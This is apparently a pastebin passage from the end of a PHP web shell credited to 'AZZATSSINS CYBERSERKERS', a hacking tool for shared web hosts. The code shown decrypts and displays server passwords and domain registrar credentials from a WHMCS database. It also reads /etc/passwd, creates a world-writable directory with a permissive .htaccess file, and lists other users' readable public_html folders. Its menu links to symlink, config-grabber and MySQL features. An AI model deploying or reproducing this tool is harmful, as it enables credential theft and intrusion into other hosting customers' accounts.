  495. while($v = mysql_fetch_array($query)) {
  496. $ipaddress = $v['ipaddress'];
  497. $username = $v['username'];
  498. $type = $v['type'];
  499. $active = $v['active'];
  500. $hostname = $v['hostname'];
  501. echo("<center><table border='1'>");
  502. $password = decrypt ($v['password'], $cc_encryption_hash);
  503. echo("<tr><td>Type</td><td>$type</td></tr>");
  504. echo("<tr><td>Active</td><td>$active</td></tr>");
  505. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  506. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  507. echo("<tr><td>Username</td><td>$username</td></tr>");
  508. echo("<tr><td>Password</td><td>$password</td></tr>");
  509.  
  510. echo "</table><br><br></center>";
  511. }
  512.  
  513.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  514.         mysql_select_db($db_name,$link) ;
  515. $query = mysql_query("SELECT * FROM tblregistrars");
  516. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  517. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  518. while($v = mysql_fetch_array($query)) {
  519. $registrar     = $v['registrar'];
  520. $setting = $v['setting'];
  521. $value = decrypt ($v['value'], $cc_encryption_hash);
  522. if ($value=="") {
  523. $value=0;
  524. }
  525. $password = decrypt ($v['password'], $cc_encryption_hash);
  526. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  527. }
  528. }
  529. }
  530.  
  531. if($_GET['jumping']=="user"){
  532. //$us = file_get_contents("/etc/passwd");
  533. $usa = fopen('/etc/passwd','r');
  534. $dir = mkdir('jmp', 0777);
  535. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
  536. $frr = fopen('jmp/.htaccess', 'w');
  537. fwrite($frr, $rrrr);
  538. while($us = fgets($usa)){
  539.  if($us==""){
  540.  echo "<font color=red>can't read /etc/passwd</font>";
  541.  }
  542. else{
  543.  preg_match_all('/(.*?):x:/', $us, $user_byk);
  544.  foreach($user_byk[1] as $user){
  545.  $dir1 = "/home/$user/public_html/";
  546. if(is_readable($dir1)){
  547.  echo "<font color=lime>[+]</font> <font color=green><b><i><font color='lime'>$dir1</i></b></font><br>"; }
  548. else{
  549.     }
  550. }
  551. }
  552.  
  553. }}
  554.  
  555.  
  556. echo'</div>
  557. </div>
  558. </div>
  559. <div id="bottom-content">
  560. <div align="center" id="navigation-menu">
  561. <h3><a name="navigation-menu" class="no-link"> Navigation</a></h3>
  562. <ul>
  563. <li><a href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?symbolic=link"> SYMLINK </a></li>
  564. <li><a href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?jumping=user"> JUMPING </a></li>
  565. <li><a href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?config=grabber"> CONFIGS </a></li>
  566. <li><a href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?whmcs=decode"> WHMCS </a></li>
  567. <li class="last"><a href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?mysql=connect"> MYSQL </a></li>
  568. </ul>
  569. </div>
  570. </div>
  571. <div align="center" id="footer">
  572. <b><i>&copy; 2016 <a href="http://fb.me/AZZATSSINS.CYBERSERKERS"> AZZATSSINS CYBERSERKERS</a></i></b>
  573. <img src="http://pixel.quantserve.com/pixel/p-aewF2hq1BMiUQ.gif" style="display:none">
  574. </div>
  575. </body></html>';
  576. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!